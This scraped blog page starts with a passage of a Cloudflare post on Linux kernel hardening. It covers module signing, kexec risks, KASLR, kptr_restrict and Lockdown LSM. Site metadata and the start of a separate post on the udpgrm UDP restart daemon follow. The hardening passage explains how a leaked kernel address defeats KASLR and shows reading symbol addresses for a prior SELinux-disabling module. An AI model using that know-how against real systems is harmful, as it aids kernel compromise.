\n
Signed kernel modules are great, but it creates a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.
But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily the kernel build system will generate a random keypair for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing is done though, instead of storing the key in a secure place, we just destroy the private key:
\n
So with the above process:
-
The kernel build system generated a random keypair, compiles the kernel and modules
-
The public key is embedded into the kernel image, the private key is used to sign all the modules
-
The private key is destroyed
With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.
There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for a new piece of hardware we are adopting). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.
\n \n
KEXEC (or kexec_load()
) is an interesting system call in Linux, which allows for one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster without going through a full reboot cycle to minimize the potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity was not quite a concern. Therefore its original design has security flaws and is known to be able to bypass secure boot and potentially compromise system integrity.
We can see the problems just based on the definition of the system call itself:
\n
struct kexec_segment {\n\tconst void *buf;\n\tsize_t bufsz;\n\tconst void *mem;\n\tsize_t memsz;\n};\n...\nlong kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);
\n
So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called purgatory. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).
At Cloudflare we have had kexec_load()
disabled for some time now just because of this. The advantage of faster reboots with kexec comes with a (small) risk of improperly initialized hardware, so it was not worth using it even without the security concerns. However, kexec does provide one useful feature — it is the foundation of the Linux kernel crashdumping solution. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. This allows to more effectively investigate kernel and other issues in production, so it is a powerful tool to have.
Luckily, since the original problems with kexec were outlined, Linux developed an alternative secure interface for kexec: instead of buffers with code it expects file descriptors with the to-be-executed kernel image and initrd and does parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can configure and require kexec to ensure the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:
\n
ignat@dev:~$ grep KEXEC /boot/config-`uname -r`\nCONFIG_KEXEC_CORE=y\nCONFIG_HAVE_IMA_KEXEC=y\n# CONFIG_KEXEC is not set\nCONFIG_KEXEC_FILE=y\nCONFIG_KEXEC_SIG=y\nCONFIG_KEXEC_SIG_FORCE=y\nCONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y\n…
\n
Above we ensure that the legacy kexec_load()
system call is disabled by disabling CONFIG_KEXEC
, but still can configure Linux Kernel crashdumping via the new kexec_file_load()
system call via CONFIG_KEXEC_FILE=y
with enforced signature checks (CONFIG_KEXEC_SIG=y
and CONFIG_KEXEC_SIG_FORCE=y
).
Note that stock Debian kernel has the legacy kexec_load()
system call enabled and does not enforce signature checks for kexec_file_load()
(similar to module signature checks):
\n
ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64\nCONFIG_KEXEC=y\nCONFIG_KEXEC_FILE=y\nCONFIG_ARCH_HAS_KEXEC_PURGATORY=y\nCONFIG_KEXEC_SIG=y\n# CONFIG_KEXEC_SIG_FORCE is not set\nCONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y\n…
\n \n
Kernel Address Space Layout Randomization (KASLR)
\n \n \n \n
\n
Even on the stock Debian kernel if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely see it would fail to disable SELinux now. This is because we hardcoded the kernel address of the selinux_state
structure in our malicious kernel module, but the address changed now:
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffb41bcae0 B selinux_state
\n
Kernel Address Space Layout Randomization (or KASLR) is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:
\n
This is to combat targeted exploitation (like the malicious module in this post) based on the knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users use the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: it will not prevent the module loading and doing harm, but it will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory potentially causing the kernel to crash.
Both the Cloudflare kernel and the Debian one have this feature enabled:
\n
ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`\nCONFIG_RANDOMIZE_BASE=y
\n \n
Restricted kernel pointers
\n \n \n \n
\n
While KASLR helps with targeted exploits, it is quite easy to bypass since everything is shifted by a single random offset as shown on the diagram above. Thus if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the runtime address from the compile time address of the same symbol (function or data structure) from the kernel’s System.map file. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.
Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the kptr_restrict sysctl. It is a good idea to set it at least to 1
to not allow regular users to see kernel pointers:(shell/bash)
\n
ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1\nkernel.kptr_restrict = 1\nignat@dev:~$ grep selinux_state /proc/kallsyms\n0000000000000000 B selinux_state
\n
Privileged users can still see the pointers:
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffb41bcae0 B selinux_state
\n
Similar to kptr_restrict sysctl there is also dmesg_restrict, which if set, would prevent regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set kptr_restrict sysctl to a non-zero value on each boot (or use some system sysctl configuration utility, like this one), you can configure dmesg_restrict initial value via the CONFIG_SECURITY_DMESG_RESTRICT
kernel configuration option. Both the Cloudflare kernel and the Debian one enforce dmesg_restrict this way:
\n
ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`\nCONFIG_SECURITY_DMESG_RESTRICT=y
\n
Worth noting that /proc/kallsyms
and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel and [new sources are continuously being found and patched]. That’s why it is very important to stay up to date with the latest kernel bugfix releases.
\n
Lockdown LSM
\n \n \n \n
\n
Linux Security Modules (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have [covered our usage of another LSM module, BPF-LSM, previously].
BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — the Lockdown LSM. Lockdown can be in three states (controlled by the /sys/kernel/security/lockdown
special file):
\n
ignat@dev:~$ cat /sys/kernel/security/lockdown\n[none] integrity confidentiality
\n
none
is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the integrity
state, the kernel tries to prevent any operation, which may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in the LSM’s man page), all of which this LSM tries to block. confidentiality
is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like perf
or eBPF.
Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is none
meaning nothing is locked down:
\n
ignat@dev:~$ uname -a\nLinux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux\nignat@dev:~$ cat /sys/kernel/security/lockdown\n[none] integrity confidentiality
\n
We can switch the system into the integrity
mode:
\n
ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown\nintegrity\nignat@dev:~$ cat /sys/kernel/security/lockdown\nnone [integrity] confidentiality
\n
It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in integrity
mode we can only switch to confidentiality
mode, but not back to none
:
\n
ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown\nnone\ntee: /sys/kernel/security/lockdown: Operation not permitted
\n
Now we can see that even on a stock Debian kernel, which as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:
\n
ignat@dev:~$ sudo insmod mymod/mymod.ko\ninsmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted
\n
And the kernel log will helpfully point out that this is due to Lockdown LSM:
\n
ignat@dev:~$ sudo dmesg | tail -n 1\n[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7
\n
As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.
If you compile your own kernel, you can go one step further and set the initial state of the Lockdown LSM to be more restrictive than none from the start. This is exactly what we did for the Cloudflare production kernel:
\n
ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9\n# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set\nCONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y\n# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set
\n \n \n
In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.
\n
Watch on Cloudflare TV
\n \n \n \n
\n
\n \n
Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.
“],”published_at”:[0,”2024-03-06T14:00:43.000+00:00″],”updated_at”:[0,”2024-10-09T23:27:22.775Z”],”feature_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ns0i42LlPwb1wadtG1bED/b54298ce9a39531920b1e075c023b857/linux-kernel-hardening.png”],”tags”:[1,[[0,{“id”:[0,”3DmitkNK6euuD5BlhuvOLW”],”name”:[0,”Security Week”],”slug”:[0,”security-week”]}],[0,{“id”:[0,”383iv0UQ6Lp0GZwOAxGq2p”],”name”:[0,”Linux”],”slug”:[0,”linux”]}],[0,{“id”:[0,”73alK6sbtKLS6uB7ZrYrjj”],”name”:[0,”Kernel”],”slug”:[0,”kernel”]}],[0,{“id”:[0,”2UVIYusJwlvsmPYl2AvSuR”],”name”:[0,”Deep Dive”],”slug”:[0,”deep-dive”]}],[0,{“id”:[0,”6Mp7ouACN2rT3YjL1xaXJx”],”name”:[0,”Security”],”slug”:[0,”security”]}]]],”relatedTags”:[0],”authors”:[1,[[0,{“name”:[0,”Ignat Korchagin”],”slug”:[0,”ignat”],”bio”:[0,null],”profile_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6l12U0uchJemRRwVMR9hDn/cd1bcd051874dbe6bd3a3de78daef984/ignat.jpg”],”location”:[0,null],”website”:[0,null],”twitter”:[0,”@ignatkn”],”facebook”:[0,null]}]]],”meta_description”:[0,”This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well.”],”primary_author”:[0,{}],”localeList”:[0,{“name”:[0,”Linux kernel security tunables everyone should consider adopting Config”],”enUS”:[0,”English for Locale”],”zhCN”:[0,”No Page for Locale”],”zhHansCN”:[0,”No Page for Locale”],”zhTW”:[0,”No Page for Locale”],”frFR”:[0,”No Page for Locale”],”deDE”:[0,”No Page for Locale”],”itIT”:[0,”No Page for Locale”],”jaJP”:[0,”No Page for Locale”],”koKR”:[0,”No Page for Locale”],”ptBR”:[0,”No Page for Locale”],”esLA”:[0,”No Page for Locale”],”esES”:[0,”No Page for Locale”],”enAU”:[0,”No Page for Locale”],”enCA”:[0,”No Page for Locale”],”enIN”:[0,”No Page for Locale”],”enGB”:[0,”No Page for Locale”],”idID”:[0,”No Page for Locale”],”ruRU”:[0,”No Page for Locale”],”svSE”:[0,”No Page for Locale”],”viVN”:[0,”No Page for Locale”],”plPL”:[0,”No Page for Locale”],”arAR”:[0,”No Page for Locale”],”nlNL”:[0,”No Page for Locale”],”thTH”:[0,”No Page for Locale”],”trTR”:[0,”No Page for Locale”],”heIL”:[0,”No Page for Locale”],”lvLV”:[0,”No Page for Locale”],”etEE”:[0,”No Page for Locale”],”ltLT”:[0,”No Page for Locale”]}],”url”:[0,”https://blog.cloudflare.com/linux-kernel-hardening”],”metadata”:[0,{“title”:[0,”Linux kernel security tunables everyone should consider adopting”],”description”:[0,”This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well.”],”imgPreview”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7IlXRVHxCWjcEo5tqlfuR5/7dc7fb4e32b9c2460a113ce134a7fbff/linux-kernel-hardening-1z20hx.png”]}]}]]],”locale”:[0,”en-us”],”translations”:[0,{“posts.by”:[0,”By”],”footer.gdpr”:[0,”GDPR”],”lang_blurb1″:[0,”This post is also available in {lang1}.”],”lang_blurb2″:[0,”This post is also available in {lang1} and {lang2}.”],”lang_blurb3″:[0,”This post is also available in {lang1}, {lang2} and {lang3}.”],”footer.press”:[0,”Press”],”header.title”:[0,”The Cloudflare Blog”],”search.clear”:[0,”Clear”],”search.filter”:[0,”Filter”],”search.source”:[0,”Source”],”footer.careers”:[0,”Careers”],”footer.company”:[0,”Company”],”footer.support”:[0,”Support”],”footer.the_net”:[0,”theNet”],”search.filters”:[0,”Filters”],”footer.our_team”:[0,”Our team”],”footer.webinars”:[0,”Webinars”],”page.more_posts”:[0,”More posts”],”posts.time_read”:[0,”{time} min read”],”search.language”:[0,”Language”],”footer.community”:[0,”Community”],”footer.resources”:[0,”Resources”],”footer.solutions”:[0,”Solutions”],”footer.trademark”:[0,”Trademark”],”header.subscribe”:[0,”Subscribe”],”footer.compliance”:[0,”Compliance”],”footer.free_plans”:[0,”Free plans”],”footer.impact_ESG”:[0,”Impact/ESG”],”posts.follow_on_X”:[0,”Follow on X”],”footer.help_center”:[0,”Help center”],”footer.network_map”:[0,”Network Map”],”header.please_wait”:[0,”Please Wait”],”page.related_posts”:[0,”Related posts”],”search.result_stat”:[0,”Results {search_range} of {search_total} for {search_keyword}“],”footer.case_studies”:[0,”Case Studies”],”footer.connect_2024″:[0,”Connect 2024″],”footer.terms_of_use”:[0,”Terms of Use”],”footer.white_papers”:[0,”White Papers”],”footer.cloudflare_tv”:[0,”Cloudflare TV”],”footer.community_hub”:[0,”Community Hub”],”footer.compare_plans”:[0,”Compare plans”],”footer.contact_sales”:[0,”Contact Sales”],”header.contact_sales”:[0,”Contact Sales”],”header.email_address”:[0,”Email Address”],”page.error.not_found”:[0,”Page not found”],”footer.developer_docs”:[0,”Developer docs”],”footer.privacy_policy”:[0,”Privacy Policy”],”footer.request_a_demo”:[0,”Request a demo”],”page.continue_reading”:[0,”Continue reading”],”footer.analysts_report”:[0,”Analyst reports”],”footer.for_enterprises”:[0,”For enterprises”],”footer.getting_started”:[0,”Getting Started”],”footer.learning_center”:[0,”Learning Center”],”footer.project_galileo”:[0,”Project Galileo”],”pagination.newer_posts”:[0,”Newer Posts”],”pagination.older_posts”:[0,”Older Posts”],”posts.social_buttons.x”:[0,”Discuss on X”],”search.icon_aria_label”:[0,”Search”],”search.source_location”:[0,”Source/Location”],”footer.about_cloudflare”:[0,”About Cloudflare”],”footer.athenian_project”:[0,”Athenian Project”],”footer.become_a_partner”:[0,”Become a partner”],”footer.cloudflare_radar”:[0,”Cloudflare Radar”],”footer.network_services”:[0,”Network services”],”footer.trust_and_safety”:[0,”Trust & Safety”],”header.get_started_free”:[0,”Get Started Free”],”page.search.placeholder”:[0,”Search Cloudflare”],”footer.cloudflare_status”:[0,”Cloudflare Status”],”footer.cookie_preference”:[0,”Cookie Preferences”],”header.valid_email_error”:[0,”Must be valid email.”],”search.result_stat_empty”:[0,”Results {search_range} of {search_total}“],”footer.connectivity_cloud”:[0,”Connectivity cloud”],”footer.developer_services”:[0,”Developer services”],”footer.investor_relations”:[0,”Investor relations”],”page.not_found.error_code”:[0,”Error Code: 404″],”search.autocomplete_title”:[0,”Insert a query. Press enter to send”],”footer.logos_and_press_kit”:[0,”Logos & press kit”],”footer.application_services”:[0,”Application services”],”footer.get_a_recommendation”:[0,”Get a recommendation”],”posts.social_buttons.reddit”:[0,”Discuss on Reddit”],”footer.sse_and_sase_services”:[0,”SSE and SASE services”],”page.not_found.outdated_link”:[0,”You may have used an outdated link, or you may have typed the address incorrectly.”],”footer.report_security_issues”:[0,”Report Security Issues”],”page.error.error_message_page”:[0,”Sorry, we can’t find the page you are looking for.”],”header.subscribe_notifications”:[0,”Subscribe to receive notifications of new posts:”],”footer.cloudflare_for_campaigns”:[0,”Cloudflare for Campaigns”],”header.subscription_confimation”:[0,”Subscription confirmed. Thank you for subscribing!”],”posts.social_buttons.hackernews”:[0,”Discuss on Hacker News”],”footer.diversity_equity_inclusion”:[0,”Diversity, equity & inclusion”],”footer.critical_infrastructure_defense_project”:[0,”Critical Infrastructure Defense Project”]}],”localesAvailable”:[1,[]],”footerBlurb”:[0,”Cloudflare’s connectivity cloud protects entire corporate networks, helps customers build Internet-scale applications efficiently, accelerates any website or Internet application, wards off DDoS attacks, keeps hackers at bay, and can help you on your journey to Zero Trust.
Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.
To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.”]}” ssr client=”load” opts=”{“name”:”Post”,”value”:true}” await-children>
2025-05-07
8 min read
At Cloudflare, we do everything we can to avoid interruption to our services. We frequently deploy new versions of the code that delivers the services, so we need to be able to restart the server processes to upgrade them without missing a beat. In particular, performing graceful restarts (also known as “zero downtime”) for UDP servers has proven to be surprisingly difficult.
We’ve previously written about graceful restarts in the context of TCP, which is much easier to handle. We didn’t have a strong reason to deal with UDP until recently — when protocols like HTTP3/QUIC became critical. This blog post introduces udpgrm, a lightweight daemon that helps us to upgrade UDP servers without dropping a single packet.
Here’s the udpgrm GitHub repo.
In the early days of the Internet, UDP was used for stateless request/response communication with protocols like DNS or NTP. Restarts of a server process are not a problem in that context, because it does not have to retain state across multiple requests. However, modern protocols like QUIC, WireGuard, and SIP, as well as online games, use stateful flows. So what happens to the state associated with a flow when a server process is restarted? Typically, old connections are just dropped during a server restart. Migrating the flow state from the old instance to the new instance is possible, but it is complicated and notoriously hard to get right.
The same problem occurs for TCP connections, but there a common approach is to keep the old instance of the server process running alongside the new instance for a while, routing new connections to the new instance while letting existing ones drain on the old. Once all connections finish or a timeout is reached, the old instance can be safely shut down. The same approach works for UDP, but it requires more involvement from the server process than for TCP.
In the past, we described the established-over-unconnected method. It offers one way to implement flow handoff, but it comes with significant drawbacks: it’s prone to race conditions in protocols with multi-packet handshakes, and it suffers from a scalability issue. Specifically, the kernel hash table used for dispatching packets is keyed only by the local IP:port tuple, which can lead to bucket overfill when dealing with many inbound UDP sockets.
Now we have found a better method, leveraging Linux’s SO_REUSEPORT
API. By placing both old and new sockets into the same REUSEPORT group and using an eBPF program for flow tracking, we can route packets to the correct instance and preserve flow stickiness. This is how udpgrm works.
Before diving deeper, let’s quickly review the basics. Linux provides the SO_REUSEPORT
socket option, typically set after socket()
but before bind()
. Please note that this has a separate purpose from the better known SO_REUSEADDR
socket option.
SO_REUSEPORT
allows multiple sockets to bind to the same IP:port tuple. This feature is primarily used for load balancing, letting servers spread traffic efficiently across multiple CPU cores. You can think of it as a way for an IP:port to be associated with multiple packet queues. In the kernel, sockets sharing an IP:port this way are organized into a reuseport group — a term we’ll refer to frequently throughout this post.
┌───────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ │
│ │ socket #1 │ │ socket #2 │ │ socket #3 │ │
│ └───────────┘ └───────────┘ └───────────┘ │
└───────────────────────────────────────────┘
Linux supports several methods for distributing inbound packets across a reuseport group. By default, the kernel uses a hash of the packet’s 4-tuple to select a target socket. Another method is SO_INCOMING_CPU
, which, when enabled, tries to steer packets to sockets running on the same CPU that received the packet. This approach works but has limited flexibility.
To provide more control, Linux introduced the SO_ATTACH_REUSEPORT_CBPF
option, allowing server processes to attach a classic BPF (cBPF) program to make socket selection decisions. This was later extended with SO_ATTACH_REUSEPORT_EBPF
, enabling the use of modern eBPF programs. With eBPF, developers can implement arbitrary custom logic. A boilerplate program would look like this:
SEC("sk_reuseport")
int udpgrm_reuseport_prog(struct sk_reuseport_md *md)
{
uint64_t socket_identifier = xxxx;
bpf_sk_select_reuseport(md, &sockhash, &socket_identifier, 0);
return SK_PASS;
}
To select a specific socket, the eBPF program calls bpf_sk_select_reuseport
, using a reference to a map with sockets (SOCKHASH
, SOCKMAP
, or the older, mostly obsolete SOCKARRAY
), along with a key or index. For example, a declaration of a SOCKHASH
might look like this:
struct {
__uint(type, BPF_MAP_TYPE_SOCKHASH);
__uint(max_entries, MAX_SOCKETS);
__uint(key_size, sizeof(uint64_t));
__uint(value_size, sizeof(uint64_t));
} sockhash SEC(".maps");
This SOCKHASH
is a hash map that holds references to sockets, even though the value size looks like a scalar 8-byte value. In our case it’s indexed by an uint64_t
key. This is pretty neat, as it allows for a simple number-to-socket mapping!
However, there’s a catch: the SOCKHASH
must be populated and maintained from user space (or a separate control plane), outside the eBPF program itself. Keeping this socket map accurate and in sync with the server process state is surprisingly difficult to get right — especially under dynamic conditions like restarts, crashes, or scaling events. The point of udpgrm is to take care of this stuff, so that server processes don’t have to.
Socket generation and working generation
Let’s look at how graceful restarts for UDP flows are achieved in udpgrm. To reason about this setup, we’ll need a bit of terminology: A socket generation is a set of sockets within a reuseport group that belong to the same logical application instance:
┌───────────────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ┌─────────────────────────────────────────────┐ │
│ │ socket generation 0 │ │
│ │ ┌───────────┐ ┌───────────┐ ┌───────────┐ │ │
│ │ │ socket #1 │ │ socket #2 │ │ socket #3 │ │ │
│ │ └───────────┘ └───────────┘ └───────────┘ │ │
│ └─────────────────────────────────────────────┘ │
│ ┌─────────────────────────────────────────────┐ │
│ │ socket generation 1 │ │
│ │ ┌───────────┐ ┌───────────┐ ┌───────────┐ │ │
│ │ │ socket #4 │ │ socket #5 │ │ socket #6 │ │ │
│ │ └───────────┘ └───────────┘ └───────────┘ │ │
│ └─────────────────────────────────────────────┘ │
└───────────────────────────────────────────────────┘
When a server process needs to be restarted, the new version creates a new socket generation for its sockets. The old version keeps running alongside the new one, using sockets from the previous socket generation.
Reuseport eBPF routing boils down to two problems:
-
For new flows, we should choose a socket from the socket generation that belongs to the active server instance.
-
For already established flows, we should choose the appropriate socket — possibly from an older socket generation — to keep the flows sticky. The flows will eventually drain away, allowing the old server instance to shut down.
Easy, right?
Of course not! The devil is in the details. Let’s take it one step at a time.
Routing new flows is relatively easy. udpgrm simply maintains a reference to the socket generation that should handle new connections. We call this reference the working generation. Whenever a new flow arrives, the eBPF program consults the working generation pointer and selects a socket from that generation.
┌──────────────────────────────────────────────┐
│ reuseport group 192.0.2.0:443 │
│ ... │
│ Working generation ────┐ │
│ V │
│ ┌───────────────────────────────┐ │
│ │ socket generation 1 │ │
│ │ ┌───────────┐ ┌──────────┐ │ │
│ │ │ socket #4 │ │ ... │ │ │
│ │ └───────────┘ └──────────┘ │ │
│ └───────────────────────────────┘ │
│ ... │
└──────────────────────────────────────────────┘
For this to work, we first need to be able to differentiate packets belonging to new connections from packets belonging to old connections. This is very tricky and highly dependent on the specific UDP protocol. For example, QUIC has an initial packet concept, similar to a TCP SYN, but other protocols might not.
There needs to be some flexibility in this and udpgrm makes this configurable. Each reuseport group sets a specific flow dissector.
Flow dissector has two tasks:
-
It distinguishes new packets from packets belonging to old, already established flows.
-
For recognized flows, it tells udpgrm which specific socket the flow belongs to.
These concepts are closely related and depend on the specific server. Different UDP protocols define flows differently. For example, a naive UDP server might use a typical 5-tuple to define flows, while QUIC uses a “connection ID” field in the QUIC packet header to survive NAT rebinding.
udpgrm supports three flow dissectors out of the box and is highly configurable to support any UDP protocol. More on this later.
Now that we covered the theory, we’re ready for the business: please welcome udpgrm — UDP Graceful Restart Marshal! udpgrm is a stateful daemon that handles all the complexities of the graceful restart process for UDP. It installs the appropriate eBPF REUSEPORT program, maintains flow state, communicates with the server process during restarts, and reports useful metrics for easier debugging.
We can describe udpgrm from two perspectives: for administrators and for programmers.
udpgrm daemon for the system administrator
udpgrm is a stateful daemon, to run it:
$ sudo udpgrm --daemon
[ ] Loading BPF code
[ ] Pinning bpf programs to /sys/fs/bpf/udpgrm
[*] Tailing message ring buffer map_id 936146
This sets up the basic functionality, prints rudimentary logs, and should be deployed as a dedicated systemd service — loaded after networking. However, this is not enough to fully use udpgrm. udpgrm needs to hook into getsockopt
, setsockopt
, bind
, and sendmsg
syscalls, which are scoped to a cgroup. To install the udpgrm hooks, you can install it like this:
$ sudo udpgrm --install=/sys/fs/cgroup/system.slice
But a more common pattern is to install it within the current cgroup:
$ sudo udpgrm --install --self
Better yet, use it as part of the systemd “service” config:
[Service]
...
ExecStartPre=/usr/local/bin/udpgrm --install --self
Once udpgrm is running, the administrator can use the CLI to list reuseport groups, sockets, and metrics, like this:
$ sudo udpgrm list
[ ] Retrievieng BPF progs from /sys/fs/bpf/udpgrm
192.0.2.0:4433
netns 0x1 dissector bespoke digest 0xdead
socket generations:
gen 3 0x17a0da <= app 0 gen 3
metrics:
rx_processed_total 13777528077
...
Now, with both the udpgrm daemon running, and cgroup hooks set up, we can focus on the server part.
udpgrm for the programmer
We expect the server to create the appropriate UDP sockets by itself. We depend on SO_REUSEPORT
, so that each server instance can have a dedicated socket or a set of sockets:
sd = socket.socket(AF_INET, SOCK_DGRAM, 0)
sd.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)
sd.bind(("192.0.2.1", 5201))
With a socket descriptor handy, we can pursue the udpgrm magic dance. The server communicates with the udpgrm daemon using setsockopt
calls. Behind the scenes, udpgrm provides eBPF setsockopt
and getsockopt
hooks and hijacks specific calls. It’s not easy to set up on the kernel side, but when it works, it’s truly awesome. A typical socket setup looks like this:
try:
work_gen = sd.getsockopt(IPPROTO_UDP, UDP_GRM_WORKING_GEN)
except OSError:
raise OSError('Is udpgrm daemon loaded? Try "udpgrm --self --install"')
sd.setsockopt(IPPROTO_UDP, UDP_GRM_SOCKET_GEN, work_gen + 1)
for i in range(10):
v = sd.getsockopt(IPPROTO_UDP, UDP_GRM_SOCKET_GEN, 8);
sk_gen, sk_idx = struct.unpack('II', v)
if sk_idx != 0xffffffff:
break
time.sleep(0.01 * (2 ** i))
else:
raise OSError("Communicating with udpgrm daemon failed.")
sd.setsockopt(IPPROTO_UDP, UDP_GRM_WORKING_GEN, work_gen + 1)
You can see three blocks here:
-
First, we retrieve the working generation number and, by doing so, check for udpgrm presence. Typically, udpgrm absence is fine for non-production workloads.
-
Then we register the socket to an arbitrary socket generation. We choose
work_gen + 1
as the value and verify that the registration went through correctly. -
Finally, we bump the working generation pointer.
That’s it! Hopefully, the API presented here is clear and reasonable. Under the hood, the udpgrm daemon installs the REUSEPORT eBPF program, sets up internal data structures, collects metrics, and manages the sockets in a SOCKHASH
.
Advanced socket creation with udpgrm_activate.py
In practice, we often need sockets bound to low ports like :443
, which requires elevated privileges like CAP_NET_BIND_SERVICE
. It’s usually better to configure listening sockets outside the server itself. A typical pattern is to pass the listening sockets using socket activation.
Sadly, systemd cannot create a new set of UDP SO_REUSEPORT
sockets for each server instance. To overcome this limitation, udpgrm provides a script called udpgrm_activate.py
, which can be used like this:
[Service]
Type=notify # Enable access to fd store
NotifyAccess=all # Allow access to fd store from ExecStartPre
FileDescriptorStoreMax=128 # Limit of stored sockets must be set
ExecStartPre=/usr/local/bin/udpgrm_activate.py test-port 0.0.0.0:5201
Here, udpgrm_activate.py
binds to 0.0.0.0:5201
and stores the created socket in the systemd FD store under the name test-port
. The server echoserver.py
will inherit this socket and receive the appropriate FD_LISTEN
environment variables, following the typical systemd socket activation pattern.
Systemd typically can’t handle more than one server instance running at the same time. It prefers to kill the old instance quickly. It supports the “at most one” server instance model, not the “at least one” model that we want. To work around this, udpgrm provides a decoy script that will exit when systemd asks it to, while the actual old instance of the server can stay active in the background.
[Service]
...
ExecStart=/usr/local/bin/mmdecoy examples/echoserver.py
Restart=always # if pid dies, restart it.
KillMode=process # Kill only decoy, keep children after stop.
KillSignal=SIGTERM # Make signals explicit
At this point, we showed a full template for a udpgrm enabled server that contains all three elements: udpgrm --install --self
for cgroup hooks, udpgrm_activate.py
for socket creation, and mmdecoy
for fooling systemd service lifetime checks.
[Service]
Type=notify # Enable access to fd store
NotifyAccess=all # Allow access to fd store from ExecStartPre
FileDescriptorStoreMax=128 # Limit of stored sockets must be set
ExecStartPre=/usr/local/bin/udpgrm --install --self
ExecStartPre=/usr/local/bin/udpgrm_activate.py --no-register test-port 0.0.0.0:5201
ExecStart=/usr/local/bin/mmdecoy PWD/examples/echoserver.py
Restart=always # if pid dies, restart it.
KillMode=process # Kill only decoy, keep children after stop.
KillSignal=SIGTERM # Make signals explicit
We’ve discussed the udpgrm daemon, the udpgrm setsockopt API, and systemd integration, but we haven’t yet covered the details of routing logic for old flows. To handle arbitrary protocols, udpgrm supports three dissector modes out of the box:
